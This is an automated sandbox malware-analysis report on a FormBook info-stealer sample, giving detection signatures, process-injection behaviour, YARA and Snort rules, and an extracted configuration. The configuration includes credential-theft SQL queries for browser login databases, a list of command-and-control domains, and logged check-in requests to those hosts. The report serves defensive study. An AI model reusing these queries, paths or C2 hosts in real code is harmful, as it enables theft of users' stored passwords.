Loading ...

Play interactive tourEdit tour

Analysis Report bXFjrxjRlb.exe

Overview

General Information

Sample Name:bXFjrxjRlb.exe
Analysis ID:344520
MD5:4a595c5540f0a097a5f11159cdf5c015
SHA1:9bd00bf1ffbdf53c841cd8d8b0a4244fdb7ba583
SHA256:d6c54588834faae60153c6a2e7318a7e9f243b9dbfbd6e0fc44d45f4d55c9fcf
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • bXFjrxjRlb.exe (PID: 1212 cmdline: 'C:\Users\user\Desktop\bXFjrxjRlb.exe' MD5: 4A595C5540F0A097A5F11159CDF5C015)
    • AddInProcess32.exe (PID: 6460 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 3684 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6932 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x99c2", "KEY1_OFFSET 0x1e39e", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1e4a9", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1cfb3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x369b5b11", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121a0", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c5", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "ecatcom.com", "what3emoji.com", "primbathandbody.com", "yt-itclub.com", "newbieeer.com", "getyoursofa.com", "mexicanitems.info", "catalogcardgames.net", "leagueofwomengolfers.com", "gvanmp.com", "midnightsunhi.com", "cnluma.com", "sunsetcherrydesigns.com", "cosmoproturkey.com", "inifinityapps.net", "making50masks.com", "battalionice.com", "uk-calculation.net", "frosteatlove.com", "bs-mag.com", "cuisd.life", "searchlx.com", "treycorbies.com", "excellencepi.com", "4week-keto-results.com", "rotationdietplan.com", "chinahousecoralville.com", "xidao168.com", "detuimelaar.com", "fairschedulinglaws.com", "jinnolouie.com", "expresslacross.com", "akealuminum.com", "madebazar.com", "phimixx.com", "jel-tv365.com", "shakahats.com", "thabaddieztrap.net", "petsglorious.com", "misuperblog.com", "scorebuddycx.com", "sgbsmb.com", "coolbeanstudios.com", "khitthihonvidai.com", "myattorneychoicesyoufind.info", "thenewsdig.com", "freeuikit.net", "everydaycollars.com", "carrerco.com", "reviewdrkofford.com", "dragonflyroad.com", "quinple.com", "kollektiv.agency", "cimbank.info", "productoshealthyandfun.com", "dovecuwnebawe.com", "saihohealth.com", "thehostingroad.com", "tadalafil.website", "whereiswillgroup.com", "ukchealth.com", "alaskanoddgoods.com", "praktik-stuff.online", "gaiactg.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.unitedfootballcamps.com/bf3/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9b4a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9dc4:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x37408:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x37682:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x158e7:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x431a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x153d3:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x42c91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x159e9:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x432a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15b61:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x4341f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa7dc:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x3809a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1464e:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x41f0c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb4d5:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x38d93:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b599:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x48e57:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c59c:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x1867b:$sqlite3step: 68 34 1C 7B E1
    • 0x1878e:$sqlite3step: 68 34 1C 7B E1
    • 0x45f39:$sqlite3step: 68 34 1C 7B E1
    • 0x4604c:$sqlite3step: 68 34 1C 7B E1
    • 0x186aa:$sqlite3text: 68 38 2A 90 C5
    • 0x187cf:$sqlite3text: 68 38 2A 90 C5
    • 0x45f68:$sqlite3text: 68 38 2A 90 C5
    • 0x4608d:$sqlite3text: 68 38 2A 90 C5
    • 0x186bd:$sqlite3blob: 68 53 D8 7F 8C
    • 0x187e5:$sqlite3blob: 68 53 D8 7F 8C
    • 0x45f7b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x460a3:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.AddInProcess32.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.AddInProcess32.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18419:$sqlite3step: 68 34 1C 7B E1
        • 0x1852c:$sqlite3step: 68 34 1C 7B E1
        • 0x18448:$sqlite3text: 68 38 2A 90 C5
        • 0x1856d:$sqlite3text: 68 38 2A 90 C5
        • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
        1.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.AddInProcess32.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a537:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b53a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 1.2.AddInProcess32.exe.400000.0.raw.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x99c2", "KEY1_OFFSET 0x1e39e", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1e4a9", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1cfb3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x369b5b11", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121a0", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c5", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: bXFjrxjRlb.exeVirustotal: Detection: 27%Perma Link
          Source: bXFjrxjRlb.exeReversingLabs: Detection: 28%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: bXFjrxjRlb.exeJoe Sandbox ML: detected
          Source: 1.2.AddInProcess32.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: bXFjrxjRlb.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: bXFjrxjRlb.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: cscript.pdbUGP source: AddInProcess32.exe, 00000001.00000002.405156768.0000000002FA0000.00000040.00000001.sdmp
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, cscript.exe, 00000007.00000002.702386130.0000000004C9F000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.388503326.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, cscript.exe
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000001.00000002.402103553.00000000009E2000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.702386130.0000000004C9F000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: cscript.pdb source: AddInProcess32.exe, 00000001.00000002.405156768.0000000002FA0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.388503326.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 4x nop then push dword ptr [ebp-24h]
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 4x nop then mov esp, ebp
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 4x nop then jmp 069C2766h
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 4x nop then push dword ptr [ebp-24h]
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 4x nop then push dword ptr [ebp-20h]
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 4x nop then push dword ptr [ebp-20h]
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 198.54.117.215:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 198.54.117.215:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 198.54.117.215:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 162.241.30.16:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 162.241.30.16:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 162.241.30.16:80
          Source: global trafficHTTP traffic detected: GET /bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xV HTTP/1.1Host: www.what3emoji.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bf3/?pPX=l8I6XPguYKFPGKeVh8gT1y9i2fKE+hPHZakSNaciRtP7EZ8w/BzDNNldYjt/uExn0X1icGC4Ug==&W6=jnKpRl-xV HTTP/1.1Host: www.thehostingroad.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bf3/?pPX=swuzFfgzYDLB3Bi4piS9eAlbkrlhpvPYJEwernceI/wmg54lN6WJu/MxY2hInTt8ZuQ329MgbQ==&W6=jnKpRl-xV HTTP/1.1Host: www.inifinityapps.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewIP Address: 198.54.117.215 198.54.117.215
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: global trafficHTTP traffic detected: GET /bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xV HTTP/1.1Host: www.what3emoji.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bf3/?pPX=l8I6XPguYKFPGKeVh8gT1y9i2fKE+hPHZakSNaciRtP7EZ8w/BzDNNldYjt/uExn0X1icGC4Ug==&W6=jnKpRl-xV HTTP/1.1Host: www.thehostingroad.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bf3/?pPX=swuzFfgzYDLB3Bi4piS9eAlbkrlhpvPYJEwernceI/wmg54lN6WJu/MxY2hInTt8ZuQ329MgbQ==&W6=jnKpRl-xV HTTP/1.1Host: www.inifinityapps.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.what3emoji.com
